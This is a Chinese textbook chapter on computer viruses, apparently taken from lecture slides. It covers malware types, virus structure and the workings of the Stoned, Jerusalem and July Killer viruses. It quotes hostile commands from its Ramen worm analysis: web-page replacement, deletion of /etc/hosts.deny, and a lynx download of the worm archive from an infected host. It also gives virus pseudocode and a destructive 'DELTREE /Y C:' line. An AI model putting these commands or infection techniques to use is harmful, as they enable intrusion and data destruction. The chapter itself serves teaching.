病毒与数据安全.ppt

第14章 病毒与数据安全,14.1 恶意代码 14.2 计算机病毒的概念 14.3 病毒的起源 14.4 病毒的危害 14.5 病毒的传播方式 14.6 病毒的特点 14.7 病毒的分类,14.8 病毒的一般结构 14.9 病毒的工作原理 14.10 宏病毒的工作原理 14.11 CIH病毒的工作原理 14.12 网络病毒的工作原理 14.13 杀毒技术 习 题,14.1 恶 意 代 码,图14-1给出了所有软件威胁的分类情况，也就是恶意代码的分类情况。这些威胁可以分成两类：需要宿主的程序和可以独立运行的程序。前者实际上是程序片段，它们不能脱离某些特定的应用程序、应用工具或系统程序而独立存在；后者是完整的程序，操作系统可以调度和运行它们。,图14-1 恶意代码分类,也可以把这些软件威胁按照能不能够自我复制来进行分类。不能够自我复制的可能是程序片段，当调用宿主程序完成特定功能时，就会激活它们。可以自我复制的程序可能是程序片段(病毒)，也可能是一个独立的程序(蠕虫、细菌)。当执行它们时，将会复制出一个或多个自身的副本。以后这些副本可以在同一个系统中或其它系统中被激活。值得注意的是，随着恶意代码编写技术的提升，各种代码之间都在取长补短，所以有些恶意代码可能包含其它的恶意代码。例如逻辑炸弹或特洛伊木马可能是病毒或者蠕虫的一部分。,1后门(Backdoor/Trapdoor,陷阱门)后门是进入程序的一个秘密入口。知道这个后门的人就可以通过它绕过访问控制的一般安全检查，而直接获得访问权限。很多年来，程序员为了调试和测试程序一直合法地使用后门。当这些后门被用来获得非授权访问时，后门就变成了一种安全威胁。2.逻辑炸弹(Logic Bomb)合法程序中的代码，当符合某种条件的时候就会“爆炸”。用来触发逻辑炸弹的条件可以是某些文件的出现或缺失、某个日期或星期几、某一特定用户运行该应用程序等。,3.特洛伊木马(Trojan Horse)特洛伊木马程序是一个有用的(或表面看起来很有用的)程序或命令过程，其中包含了秘密代码。当调用的时候，这些秘密代码将执行一些不必要的或有害的操作。当未授权用户无法直接完成某些操作的时候，就可以通过特洛伊木马程序来间接完成。比如在一个多用户操作系统中，如果想访问其它用户的文件，那么用户就可以创建一个特洛伊木马程序。当执行它的时候，将改变用户文件的访问权限，这样，任何用户都能读取它。,接着攻击者为了诱使用户运行该程序，就会把它放在公共目录里，并给它取一个听起来好像是一个很有用的程序的名字。当另一个用户运行该程序后，攻击者就能够访问该用户的文件信息了。很难被检测到的一种特洛伊木马程序就是编译器。通过修改正常的编译器，就可以在编译某些程序的时候插入附加代码，比如系统登录程序。该代码在登录程序中留下后门，这样攻击者就可以使用特殊的口令登录到系统中。,4.病毒(Virus)病毒是能够通过修改其它程序而“感染”它们的一种程序。修改以后的程序里面包含了病毒程序的一个副本，这样它们就能够继续感染其它程序。5蠕虫(Worm)网络蠕虫通过网络连接从一个系统向另一个系统传播。一旦在一个系统中激活，网络蠕虫就能够像计算机病毒或细菌一样活动。它也能植入特洛伊木马程序或执行一些破坏性动作。,在复制自身的时候，网络蠕虫会使用一些网络工具。这包括：电子邮件功能：蠕虫会把自身的副本邮寄到其它系统 中去。远程执行能力：蠕虫能够运行其它系统中的副本。远程登录能力：蠕虫能够像用户一样登录到远程系统中，然后使用系统命令从一个系统向另一个系统复制自身。,这样，蠕虫程序的一个新的副本就在远程系统中运行了。网络蠕虫和计算机病毒有很多相似之处，包括休眠期、传播期、触发期和执行期等。下面我们通过一个蠕虫的例子来对蠕虫做以更深入的了解。Ramen是一个利用RedHat现有远程漏洞自动传播的蠕虫。此蠕虫由多个攻击性缺陷(Exploit)和自动执行脚本组成，专门针对存在rpc.statd远程溢出、wu-ftpd、lpd格式化字符串漏洞的RedHat 6.2和RedHat 7.0系统进行入侵。,此蠕虫中包含以下文件：asp：一个RedHat7下面的xinetd配置文件，监听端口27374。asp62：一个简单的httpd服务守护进程。当连接此服务时，它会提供此蠕虫的压缩包，此蠕虫主要靠此服务传播(RedHat 6.2)。asp7：一个简单的httpd服务守护进程。当连接此服务时，它会提供此蠕虫的压缩包，此蠕虫主要靠此服务传播(RedHat 7.0)。bd62.sh：蠕虫的安装程序(RedHat 6.2)。,bd7.sh：蠕虫的安装程序(RedHat 7.0)。getip.sh：获得主机IP的脚本。hackl.sh：读取.l文件，并且把地址写入lh.sh。hackw.sh：读取.w文件，并且把地址写入wh.sh。index.html：HTML 文件。蠕虫用此文件替换主机的首页。l62：修改过的LPRng 的格式化字符串攻击程序(RedHat 6.2)。,l7：修改过的LPRng 的格式化字符串攻击程序(RedHat 7.0)。lh.sh：执行LPRng exploit的脚本。randb62：随机产生一个B类的IP地址(RedHat 6.2)。randb7：随机产生一个B类的IP地址(RedHat 7.0)。s62：修改过的statdx的漏洞(RedHat 6.2)。s7：修改过的statdx的漏洞(RedHat 7.0)。,scan.sh：从randb程序中取得一个B类的网络地址，然后运行synscan。start.sh：此蠕虫的开始程序。start62.sh：后台开始运行 scan.sh,hackl.sh,hackw.sh脚本。start7.sh：和start62.sh功能相同。synscan62：修改过的synscan(RedHat 6.2)。synscan7：修改过的synscan(RedHat 7.0)。w62：修改过的wu-ftpd 2.6的漏洞(RedHat 6.2)。w7：修改过的wu-ftpd 2.6的漏洞(RedHat 7.0)。wh.sh：运行exploit的脚本。wu62：修改过的wu-ftp 2.6的exploit。,它的感染过程如下：入侵者先攻击进入一台RedHat 6.2或者RedHat 7.0，上传此蠕虫，运行start.sh脚本，感染第一台RedHat：(1)start.sh查找主机的Web主页面，并且用自己的页面替换它：nohup find/-name index.html-exec/bin/cp index.html;&(2)删除hosts.deny文件：rm-f/etc/hosts.deny,(3)运行getip.sh，取这台主机的IP地址。最后，简单判断此系统是RedHat 6.2还是RedHat 7.0后，安装相应的服务文件，开始工作。Ramen Worm扫描随机产生的地址范围，根据取回的FTP标志和端口信息来判断RedHat系统，进行相应的入侵。,当Ramen进入另外一个系统后，会在系统上做如下动作：(1)在/usr/src/建立隐藏目录.poop/mkdir/usr/src/.poop;cd/usr/src/.poop。(2)通过lynx这个文本浏览器来取得已经中了Ramen的机器上的蠕虫文件:lynx-source http:/%s:27374/usr/src/.poop/ramen.tgz 解开此压缩包，并且复制一份到/tmp目录下。(3)运行start.sh 感染系统，并且发一份E-mail到和gb31337.通知此蠕虫的主人。,6.细菌(Bacteria)细菌是那些不会直接损坏文件的程序，它们的惟一目的就是复制自己。细菌以指数的形式增长，最终会占用全部的处理器、内存或磁盘空间，从而使用户无法访问这些资源。,14.2 计算机病毒的概念,计算机病毒是一种特殊的计算机程序，由于计算机病毒具有与生物学病毒相类似的特征(潜伏性、传染性、发作期等)，所以人们就用生物学上的病毒来称呼它。,1994年2月28日，我国出台的中华人民共和国计算机安全保护条例对病毒的定义如下：“计算机病毒是指编制、或者在计算机程序中插入的，破坏数据、影响计算机使用，并能自我复制的一组计算机指令或者程序代码。”这只是计算机病毒的狭义定义，就广义而言，计算机病毒是指凡驻留于计算机内部(指掌握着系统的控制权)，对系统原有功能进行非正确或用户未预计修改的程序。常见的广义上的计算机病毒有逻辑炸弹、特洛伊木马等。,计算机病毒程序比较小，一般不会超过5 KB。与计算机其它合法程序一样，可以存储，可以执行，但是它没有文件名，不能在磁盘中以文件的形式独立存在。表14-1是病毒程序与正常程序的比较。,表14-1 病毒程序与正常程序的比较,计算机病毒寄生于磁盘、光盘等存储介质当中。这时它是静态的，不会感染，也不会起破坏作用。当用寄生了病毒的磁盘启动计算机时，或者执行染毒程序时，病毒就会随着合法程序的运行进入计算机内存，这时病毒进入活跃状态，随时可以进行感染和破坏，这个过程被称为病毒激活。病毒被激活后，随时可能进行感染和破坏。不同的病毒有不同的感染目标，病毒的破坏行为也是不同的。虽然现在对计算机病毒的定义存在着差异，但都肯定这样的一个事实，即：计算机病毒是一种特殊的程序。,14.3 病 毒 的 起 源,“计算机病毒”一词首次出现在1977年由美国的Thomas J.Ryan出版的一本科幻小说The Adolescence of P-1中。在这部小说中作者幻想出世界上第一个计算机病毒，它可以从一台计算机传播到另一台计算机，最终控制7000多台计算机的操作系统，造成了一场大灾难。,10年后，计算机病毒由幻想变成现实，并广为传播。一般认为，计算机病毒的发源地在美国。早在20世纪60年代初期，美国电报电话公司贝尔研究所里的一群年轻研究人员常常做完工作后留在实验室里饶有兴趣的玩一种他们自己创造的计算机游戏，这种被称为“达尔文”的游戏很刺激。它的玩法是，每个人编一段小程序，输入到计算机中运行，互相展开攻击并设法毁灭他人的程序。这种程序就是计算机病毒的雏形，然而当时人们并没有意识到这一点。,也有人认为，计算机病毒来源于爱好者的表现欲。这些 人编制计算机病毒的目的不是为了破坏，而是为了显示他们渊博的计算机知识和高超的编程技巧。又有一些人认为，计算机病毒来源于软件的加密技术。软件产品是一种知识密集的高科技产品，软件产品的研制耗资巨大，而且生产效率很低，但复制软件却异常的简单。由于各种原因，社会未能给软件产品提供有力的保护，大量存在非法拷贝和非法使用的情况，严重地损坏了软件产业的利益。,为了保护软件产品，防止非法复制和非法使用，软件产业发展了软件加密技术，使软件产品只能使用，不能复制。早期的加密技术只是为了自卫，可以使程序锁死，使非法用户无法使用，或者使磁盘“自杀”，防止非法用户重复破译。后来随着加密与破译技术的激烈对抗，软件加密从自卫性转化为攻击性，于是产生了计算机病毒。还有人认为，计算机病毒来源于感情的寄托。有些病毒信息具有明显的感情色彩，表明病毒制造者借用病毒发泄心中郁愤，这种病毒的发作显示信息往往直书心意。,计算机界真正认识到计算机病毒的存在是在1983年。在这一年11月3日召开的计算机安全学术讨论会上，美国计算机安全专家科恩(Frederick Cohen)博士首次提出了计算机病毒的概念，随后获准进行实验演示。由此证实了计算机病毒的存在，并证明计算机病毒可以在短时间内实现对计算机系统的破坏，且可以迅速地向外传播。,14.4 病 毒 的 危 害,计算机病毒都有感染性，它能广泛传播，但这并不可怕，可怕的是病毒的破坏性。归纳起来，计算机病毒的危害大致有如下几个方面：(1)破坏磁盘文件分配表(FAT表)。使磁盘的信息丢失，这时使用DIR命令察看文件，就会发现文件还在，但是文件的主体已经失去联系，文件已无法再用。,(2)删除软盘或磁盘上的可执行文件或数据文件，使文件丢失。(3)修改或破坏文件中的数据，这时文件的格式是正常的，但内容已发生了变化。这对于军事部门或金融系统的破坏是致命的。(4)产生垃圾文件，占据磁盘空间，使磁盘空间逐渐减少。(5)破坏硬盘的主引导扇区，使计算机无法启动。(6)对整个磁盘或磁盘的特定扇区进行格式化，使磁盘中的全部或者部分信息丢失。,(7)破坏计算机主板上BIOS内容，使计算机无法工作。(8)破坏网络中的资源。(9)占用CPU运行时间，使运行效率降低。(10)破坏屏幕正常显示，干扰用户的操作。(11)破坏键盘的输入程序，使用户的正常输入出现错误。(12)破坏系统设置或对系统信息加密，使用户系统工作紊乱。,14.5 病毒的传播方式,病毒若想摧毁对方的计算机系统，必须先夺得对方计算机系统的控制权，当用户运行一个带病毒的可执行文件时，首先执行的是病毒体程序，而不是原程序本身。病毒程序在执行过程中，如果驻留内存，则它首先要修改中断向量，使这个向量指向病毒，以便及时获得控制权。如果不驻留内存，则它将寻找感染对象并感染之。病毒的传播途径有五种：,(1)利用电磁波；(2)利用有线线路传播；(3)直接放毒；(4)利用微波传输；(5)利用军用或民用设备传播。,14.6 病 毒 的 特 点,计算机病毒是一种特殊的程序，除与其它正常程序一样可以存储和执行之外，还具有以下几个与众不同的特点。14.6.1 感染性(传染性)计算机病毒的感染性是指病毒把具有自身复制到其它程序中的特性。感染性是病毒的根本属性，也是判断一个可疑程序是否是病毒的主要依据。,计算机病毒多有自己的标志。当染毒程序运行时，病毒随着合法的程序进入计算机系统，虎视眈眈的监视着计算机的运行，一旦发现某个程序没有自己的标志，也就是说，没有被感染，就立刻发起攻击。还有一些病毒，不管有没有被自己感染过，只要有机会就发起攻击，形成重复感染。,14.6.2 潜伏性(隐蔽性)计算机病毒的潜伏性是指病毒具有依附其它媒体而寄生的能力。计算机感染病毒后并不是马上破坏计算机系统的，而是要潜伏一段时间，这就是病毒的潜伏期。从病毒感染某个计算机系统开始到该病毒发作为止的这段时间，就是病毒的潜伏期。,病毒之间潜伏性的差异很大。有的病毒非常外露，每次病毒程序运行的时候都企图进行感染，但是这种病毒的编制技巧比较粗糙，很容易被人发现，结果是以很高的感染效率换来很短的生命；有的病毒非常不容易发现，它通过降低感染发作的频率来隐蔽自己，侵入系统后不露声色，以看上去近似偶然的机会进行感染，以求获得较大的感染范围，一段时间后突然发作进行破坏。与外露型病毒比较，这种隐蔽型的病毒更为凶狠、可怕。,14.6.3 可触发性 计算机病毒因某个事件或某个数值的出现，诱发病毒进行感染或进行破坏，称为病毒的可触发性。为了隐蔽自己，病毒必须潜伏下来，少做动作。但如果完全不动，又失去了作用，因此病毒为了又隐蔽自己，又保持杀伤力，就必须给自己设置合理的触发条件。每个病毒都有自己的触发条件，这些条件可能是时间、日期、文件类型或某些特定的数据。如果满足触发条件，病毒就进行感染或破坏，如果还没有满足条件，病毒就继续潜伏。,14.6.4 破坏性 病毒破坏文件或数据，甚至破坏主板，干扰系统的正常运行，称为计算机病毒的破坏性。病毒的破坏性只有在病毒发作的时候才体现出来。病毒的破坏程度取决于病毒制造者的目的和技术水平。病毒的破坏行为可以是不同程度的损坏。一些病毒只是干扰系统的运行，如干扰屏幕显示、降低机器的运行速度等；有一些病毒却能给计算机系统造成不可恢复的破坏，如将用户的信息删除。世界上每年由于计算机感染病毒造成的损失达数亿美元。,第二个层面就是以上说的由于衍生性给病毒家族带来了更多的变种，使人们防不胜防。这正像感冒病毒一样，具有多种变种，因此使很多感冒药的使用周期很短，迫使人类加快新感冒药的研制。,14.7 病 毒 的 分 类,14.7.1 攻击对象 1攻击DOS的病毒 在已发现的病毒中，攻击DOS的病毒种类最多，数量最多，而且每一种病毒都有变种，所以，这种病毒传播得最广泛。如小球病毒就是国内发现的第一个DOS病毒。,2攻击Windows的病毒 Windows操作系统的发展一日千里，从Windows 3.x到Windows 95，再到Windows 98，再到如今的Windows 2000，在各国掀起了一次次的推广及应用热潮。使用Windows的人越来越多，使Windows成为PC机的主流平台。人们在适应了新一代Windows环境的同时，也同时品尝了病毒潜入Windows系统的痛苦。攻击Windows的病毒主要是宏病毒，有感染Word的宏病毒，有感染Excel的宏病毒，还有感染Access的宏病毒，其中感染Word的宏病毒最多。如Concept病毒是世界上首例感染Word的宏病毒。,3攻击网络的病毒 随着Internet的迅猛发展，没有在网络中徜徉过的人已经成为了时代的弃儿，上网已经成为了一种时尚。随着网络用户的增加，网络病毒的传播也就更为迅速与广泛，病毒造成的危害也就越大。如GPI病毒就是世界上第一个专门攻击网络的病毒。,14.7.2 寄生方式 1操作系统型病毒 这类病毒寄生在计算机磁盘的操作系统引导区，在启动计算机时，能够运行病毒程序，然后再运行启动程序。这种病毒的破坏力很强，可使系统瘫痪，再也无法启动。,2入侵型病毒 这类病毒将自己插入到感染的目标程序中，使病毒程序与目标程序成为一体。这类病毒程序写起来很难，要求病毒在感染程序中自动地找到恰当的位置，把自身插入，同时还要保证病毒可以正常的实施攻击，且感染的程序还可以正常的运行。这类病毒数量不多，但是危害极大，而且很难检测，有时候即使是查出病毒并将它杀除，但是被感染的程序也已经没法再使用了。3外壳型病毒 外壳型病毒寄生于被感染程序的头部或尾部，对源程序不作改动。这类病毒易于编写，数量也最多。,14.7.3 破坏力 1良性病毒 良性病毒指的是那些只表现自己，而不破坏计算机系统的病毒。它们多是出自一些恶作剧的人之手，病毒编制者不是为了对计算机系统进行破坏，而是为了显示他们在计算机编程方面的技巧和才华，但是这类病毒会干扰计算机系统的正常运行。,2恶性病毒 恶性病毒就像是计算机系统的恶性肿瘤，它们的目的就是为了破坏计算机系统的信息资源。常见的恶性病毒破坏行为就是删除计算机内存的数据与文件；也有的是不删除文件，而是让磁盘乱作一团，表面上看不出有什么破坏痕迹，但是原来的数据和文件都已经改变；还有的对硬盘或磁盘进行格式化，使上面的信息全部丢失；甚至有更厉害的，如CIH病毒，它不仅能够破坏计算机系统的资源，还可以破坏计算机的硬件。,14.7.4 感染方式 1引导型病毒 也称作磁盘引导型病毒。磁盘分为软盘和硬盘，若想在磁盘上存储信息就必须事先进行格式化(也称初始化)。计算机在对磁盘进行格式化时，在磁盘的最开始的地方建立操作系统的引导程序(也称引导记录)，磁盘在这个最开始的地方被称为引导区。计算机启动时，首先运行引导区的引导程序，然后由引导程序引导操作系统启动计算机。引导型病毒就把自己存放在磁盘的引导区，当作正常的引导程序，而将真正的引导程序搬到其它位置(一般在主引导区和C盘引导区之间的隐含扇区)。,计算机启动时，就会把病毒程序当作正常的引导程序来运行，使寄生在磁盘引导区的静态病毒进入计算机系统，病毒于是变为活跃状态(也称作被激活)，这时病毒就可以随时的进行感染和破坏了。这种病毒的感染目标是一致的，所以比较好防治。2系统程序病毒 操作系统的程序称作系统程序。系统程序型的病毒专门感染操作系统程序，一旦计算机感染上这样的病毒，操作系统一运行，这台计算机就成为传播病毒的基地。,3一般应用型病毒这类病毒感染计算机的一般应用程序，如电子表格等。当然，病毒还有其它的分类方式，在此就不一一列举了。,14.8 病毒的一般结构,计算机病毒是一种特殊的程序，它寄生在正常的、合法的程序中，并以各种方式潜伏下来，伺机进行感染和破坏。在这种情况下，我们称原先的那个正常的、合法的程序为病毒的宿主或宿主程序。计算机病毒具有感染和破坏能力，这与病毒的结构有关，病毒程序一般由以下感染标记、感染程序模块、破坏程序模块和触发程序模块等四个部分组成。,1感染标记 它又称为病毒签名。病毒程序感染宿主程序时，要把感染标记放到宿主程序中，作为该程序已经被感染的标记。感染标记是一些数字或字符串。病毒在感染健康的程序之前，先要对感染对象进行搜索，查看它是否已被感染，带有感染标记。如果有，说明它已被感染过，如果没有，病毒将感染该程序。不同的病毒有不同的感染标记，感染标记的位置也不同。但是，并不是所有的病毒都有感染标志，可以重复感染的病毒就没有。,2感染程序模块 感染程序模块是病毒程序的重要组成部分，它负责病毒的感染工作，主要完成三件事：寻找目标。一般是一个可执行文件，如EXE文件或COM文件。检查该文件是否有感染标记。如果没有，则进行感染，将病毒程序和感染标记放入宿主程序中。,3破坏程序模块 破坏程序模块负责病毒的破坏工作。计算机之所以可怕是因为它对计算机系统有破坏能力，由于病毒编写者的目的不同，病毒的破坏力也不同。4触发程序模块 病毒的触发条件是由现有病毒的编制者设置的，触发程序判断触发条件是否满足，并根据判断结果来控制病毒的感染和破坏动作。触发条件有多种形式，例如：日期、时间、发现某个特定程序、感染的次数、特定的中断调用次数等，还可以是这些条件的组合。,5举例一个简单的病毒结构如下所示。Program V:=goto main;1234567;subroutine infect-executable:=loop:file:=get-random-executable-file;if(first-line-of-file=1234567)then goto loop,else prepend V to file;subroutine do-damage:=whatever damage is to be donesubroutine trigger-pulled:=return true if some condition holdsmain:main-program:=infect-executable;/*感染*/if trigger-pulled then do-damage;/*是否触发*/goto next;next:,在这个例子当中，病毒代码V放在被感染程序的前部，当调用程序时，程序的入口点是病毒程序的第一行。受感染的程序首先执行病毒代码，运行情况如下。通过第一行代码跳到病毒程序的主体部分。第二行是一个特殊标记，病毒通过它来判断目标程序是否已经感染了这种病毒。当调用程序的时候，控制权立即转移到病毒程序的主体部分。病毒程序首先检查那些未受感染的可执行程序并感染它们。然后病毒进行一些操作，通常会破坏系统。每次执行程序的时候都会进行这些操作。它也可以是一个逻辑炸弹，仅在特定的条件下触发。最后病毒把控制权交给原来的程序。,前面介绍的这类病毒很容易被发现，因为程序感染以后要比相应的未感染程序长。要逃避这种检测病毒的简单方法需要压缩可执行文件，以便感染前后程序的长度一样。这里假设程序P1已经感染了病毒CV。当运行该程序的时候，控制权转移给病毒，然后执行如图14-2所示的步骤：,(1)当发现未感染的文件P2的时候，病毒首先把它压缩，生成新的文件P2,它的长度是原程序的长度减去病毒长度的差。(2)把病毒的一个副本添加到该压缩文件的前面部分。(3)解压收到感染的原程序的压缩形式P1。(4)执行解压后的原程序。,图14-2 压缩式病毒的执行过程,相应的病毒程序如下：Program CV:=goto main;1234567;subroutine infect-executable:=loop:file:=get-random-executable-file;if(first-line-of-file=1234567)then goto loop；,compress file;prepend CV to file;main:main-program:=infect-executable;uncompress rest-of-file;run uncompressed file;,14.9 病毒的工作原理,14.9.1 引导型病毒的工作原理 在病毒的分类中已经提到过，引导型病毒感染的是硬盘的主引导区或软盘的引导扇区，它是BIOS调入内存的第一个程序。这样的话，病毒已经常驻内存，一旦满足条件(调用了被病毒修改后的某个中断服务程序)，病毒就会兴风作浪。软盘引导区被感染的传染机制也差不多，但是病毒感染引导扇区的隐蔽性比较差。,因为软盘和硬盘不同，它没有隐含的扇区(在主引导程序和DOS引导扇区之间)，所以病毒要么把正常的引导扇区内容放到软盘的最后一个扇区，要么放到根目录区，则当用户显示软盘目录时就会得到乱七八糟的文件名，引起用户的警觉。有的病毒干脆就不保存正常的引导程序，这样用这种软盘启动时就不能正常引导系统，这也很快会被用户发现。,大麻病毒就是一种很典型的引导型病毒。它也叫做石头病毒或新西兰病毒。它感染硬盘的0柱面0头1扇区，即硬盘的主引导扇区或者感染软盘的0磁道0头1扇区，即软盘的引导扇区。对硬盘而言，正常的引导程序放在第7个扇区，对于软盘则放在根目录区中的某一扇区。大麻病毒的程序长度有512个字节。病毒将自身驻留到计算机的内存高端，使内存总量比实际值少2 KB。发作时，在屏幕上显示：“Your PC is now stoned!”它的工作原理如下。,1.加载过程 由于大麻病毒将自身存放在硬盘的主引导扇区(软盘的引导扇区)，因而系统启动时，自举程序便把病毒体当作系统的引导程序装入到内存，并将系统控制权交给病毒程序。就这样，大麻病毒简简单单地得到了控制权。之后病毒修改INT 13H的程序入口地址(即中断向量，INT 13H是磁盘中断)，将其指向病毒程序本身，同时把正确的INT 13H的程序入口地址保留好。,接下来减少DOS可用的内存空间，使病毒程序常驻内存。最后把正确的主引导区(对软盘而言是引导扇区)原来的内容调入内存，开始正常的计算机启动程序。这样一来，今后一旦其它的应用程序借助这个中断程序进行有关的键盘操作，首先就被病毒盗取控制权，执行病毒程序，再由病毒程序将控制权交给原有的中断服务程序完成正在执行的磁盘操作。当然在病毒获得控制权以后，它可以进行传播和破坏。,2传染过程 当其它程序通过INT 13H中断服务程序执行磁盘操作时，由于这时该中断向量已经指向了病毒程序，因此病毒程序自动地获得控制权，首先运行。病毒程序先判断一下是否是读盘操作，若是，则把当前磁盘的0号相对扇区读入内存，并判断它是否感染过这个病毒。如果已经感染了，则执行正常的读盘操作，没有必要再感染一次；,若没有被感染，则把正常的0扇区内容放到病毒指定的位置(对软盘而言是根目录区中的某一扇区，对硬盘而言是文件分配表的第7扇区)，再将病毒程序写入该磁盘的0号扇区。这样病毒就将自身复制了一份放在原来未感染的磁盘上，完成其传播。传播之后，病毒程序再执行正常的磁盘操作。,3破坏过程 大麻病毒并没有专门的破坏过程。以上讲过，病毒要把原引导区写到硬盘文件分配表的第7扇区。既然是文件分配表的第7扇区，那么DOS 就会认为这个扇区中表项为0的对应磁盘上的簇是自由空间，于是就会把数据存放进去。这样一来，经过一段时间，这个主引导扇区中所有的为0的字节都被填充了其它内容，以至于硬盘主引导程序被破坏，将来病毒调用它来启动计算机时就无法启动起来。,假如在病毒把主引导扇区写到FAT的第7扇区前的这部分文件分配表所对应的磁盘上的数据区已经分配完毕，那么这部分的文件分配表项就出错了，这将导致一些文件的丢失。而对于软盘而言，如果写进去的根目录扇区已经有目录表项占用，那么这几个文件的数据表项就丢失了；如果该位置还没有目录表项占用，那么就损失了16个文件目录表项(一个扇区512个字节，一个目录表项为32个字节，所以512/32=16)。,14.9.2 文件型病毒的工作原理 文件型病毒专门攻击后缀名是COM、EXE、SYS、DLL等的可执行文件。上面说了，因为它感染的是可执行文件，所以它要迟于引导型病毒。它也有像引导型病毒一样的加载、感染、破坏过程。以下以著名的耶路撒冷病毒为例来说明它的工作原理，如图14-3所示。耶路撒冷病毒也叫做黑色星期五病毒，因为它有两个触发条件，所以它有两种破坏方式：一种是使计算机速度降低20%；另一种是删除可执行文件。它使染毒文件增加1813个字节。,1加载过程 当运行感染了耶路撒冷病毒的可执行文件时，现有病毒将获得系统的控制权。病毒随即判断它是否已常驻内存，如果已常驻内存，则把控制权交给可执行文件，进行正常操作；如果没有的话，则先把病毒调入内存，然后修改INT 21H中断向量，将其指向病毒程序所在的内存地址，并保存正常的INT 21H中断向量。,图14-3 耶路撒冷病毒加载过程,修改完毕后，病毒程序判断计算机日期是否是13日，随后再判断是否是星期五，若同时满足这两个条件则置某一特征单元(0EH)为1，否则为0。最后，调用DOS常驻内存功能把病毒体常驻内存，然后把控制权交给可执行文件，执行正常的程序操作。,2传染过程 耶路撒冷病毒加载之后，时刻等待时机准备传染。它监视INT 21H中断，当用户执行INT 21H的4BH号功能时(INT 21H是DOS 的系统管理功能调用，有很多功能，分别用功能号来表示，其中4BH号功能为加载程序功能，用的很多，一般外部命令的执行都需要用这个中断服务程序)，病毒程序获得控制权，它先判断0EH单元的值，如为0则进行感染，若为1则运行发作程序段。,耶路撒冷病毒感染后缀名为COM和EXE的可执行文件的机制稍有不同。传染前者时，它首先申请64 KB内存，若申请成功，将病毒程序传送到该内存区的前端；其次将原有文件读入内存紧接病毒程序存放，同时病毒标志 MsDos 追加到原程序尾；最后将这三部分内容统一存盘，并退出病毒传染程序。感染后者时，比较复杂，首先修改文件头信息，修改过程为：(a)将文件头控制信息读入自内存 4FH开始的1CH个单元中；(b)将值1984H送入61H单元；(c)将堆栈段和代码段的入口地址送43H4AH单元保存；,(d)修改051H054H单元值，使文件总长度增加710H71FH中的某一段；(e)修改5DH60H和63H64H值，使其指向程序中病毒代码的入口和其所新设堆栈入口；(f)将修改后的文件控制头信息写回原文件。完成对EXE文件头控制信息的修改后，传染程序移动文件指针到病毒程序存放处，最后将传染程序在内存中驻留的710H字节病毒存入位于文件结尾处的磁盘存储区，退出病毒传染程序。,3发作过程 如果0EH值为1，则修改文件属性，然后删除任何一个在计算机上运行的COM或EXE文件，退出发作程序，执行原4BH号功能调用。如果不为1，则病毒程序内部有一个计数器，它对系统调用INT 8H中断的次数进行计数，当计数值为0时，病毒强迫计算机运行一段无用程序，使系统工作速度减慢。如果计数值为2，病毒在屏幕上显示一个“长方块”的小窗口。,14.10 宏病毒的工作原理,宏病毒是新型病毒的代表，它是随着Microsoft的办公自动化软件Office的流行开始慢慢流行起来的。,为了减少用户的重复劳作，比如进行相似的操作，Office提供了一种所谓宏的功能。利用这个功能，用户可以把一系列的操作记录下来，作为一个宏，之后只要运行这个宏，计算机就能自动地重复执行那些定义在宏中的所有操作。这种宏操作一方面方便普通的计算机用户，另一方面给病毒制造者提供了可乘之机。简单地说，宏是一组批处理命令，是用高级语言编写的一段程序。,宏病毒是一种专门感染Office系列文档的恶性病毒。1995年，世界上发现了第一只宏病毒Concept后，很快中国就发现了“台湾NO.1”宏病毒。由于VBA语言简单易学，因此大量的宏病毒开始诞生，两年间，数量就上升至20 000多种！,宏病毒的传播方法与其它病毒不同，在我们的Office目录下，有一个“Templates”目录，里面有一个Normal.dot文件，这个文件就是Word的常规模板文件，每次我们启动Word的时候，该文件都会先被Word启动并执行里面的VBA语句(宏语句)。通常来说，一般用户的Normal.dot里面是没有VBA语句的，毕竟不是每个人都会编写VBA。因此，大多数宏病毒都会采用感染Normal.dot，把自身的恶意VBA语句复制到Normal.dot里面，使Word每次启动时都执行里面的恶意VBA语句，并将自己的代码复制到其它Word文档里面的方法来达到传染的目的。,当用户打开一个感染了Word宏病毒的文档时，就等于激发了Word宏病毒的运行，它将组成宏病毒的其它几个宏复制到Word的通用模板Normal.dot中。这就相当于感染了用户的Word本身，使得以后新建或打开的文档都将被宏病毒感染，其中有些宏与文件的保存和关闭有关，如FileSaveAs、FileSave、FileClose等。当用户保存或关闭文档时，激发这些宏的运行，将当前的文档转换成模板形式保存，并将宏病毒代码添加在文档中，使其成为原先宏病毒的复制品，完成了病毒的复制，为其再次传播提供可能。,除了Word宏病毒外，还出现了感染Amipro、Eexel、Access的宏病毒。宏病毒还可以在它们之间进行交叉感染，并由Word感染Windows的VXD。很多宏病毒具有隐形、变形能力，并具有对抗反病毒软件的能力。宏病毒还可以通过电子邮件等功能自行传播。一些宏病毒已经不再在FileSaveAs 时暴露自己，并克服了语言版本的限制，可以隐藏在RTF 格式文档中。,七月杀手是第一只能格式化硬盘的宏病毒(正确来说应该是把C盘的文件全部删除)。当病毒发作时，屏幕会出现一些观点，如果你不点“是”来赞同它的观点，它就会偷偷打开你C盘下的Autoexec.bat文件，删除里面的内容，然后加上一句“DELTREE/Y C:”，这样在下一次开机的时候，会删除C:盘下的所有目录和文件。,为了对付这些层出不穷的宏病毒，Microsoft公司从Word 95到Word 97就取消了几个重要的宏的复制命令语句。另外，各种杀毒软件也针对着宏的复制命令来判断一个宏是否为病毒。但是，道高一尺，魔高一丈：七月杀手成功地避开了复制语句，它先在C盘下新建一个叫做“class.sys”的隐藏文件，然后把自身代码写到该文件里，传播时再从该文件里读取代码，再写到其它文档里面。,计算机一旦被七月杀手病毒感染，就会经常出现保存Normal.dot的对话框。另外，Word 97有很多菜单选项都失灵了(“工具”菜单基本上都无效了)，无法通过Visual Basic编辑器来查看宏代码，这是宏病毒的最典型特点。再检查Normal.dot的文件大小，发现其由正常的28 672字节变成了69 724字节，还有在注册表中HKEY_CURRENT_USERSoftwareMicrosoftOffice8.0WordOptions主键下，以EnableMacroVirusProtection为键名的键值变成了“0”(原来该值为“1”)。,这样一来，Word的自动检测宏的能力就完全被禁止了，通过以上种种现象，可以肯定这台电脑中了宏病毒，但是用杀毒软件却又查不出个究竟。这时，就应尝试用人工的方法:(1)删除Normal.dot文件，这个文件删除后，Word会在下次启动时自动恢复；(2)修改注册表，把EnableMacroVirusProtection的值由“0”改成“1”，恢复Word的检测宏的能力。,接着启动Word，但是恢复后Normal.dot竟然再一次被感染了，还是69 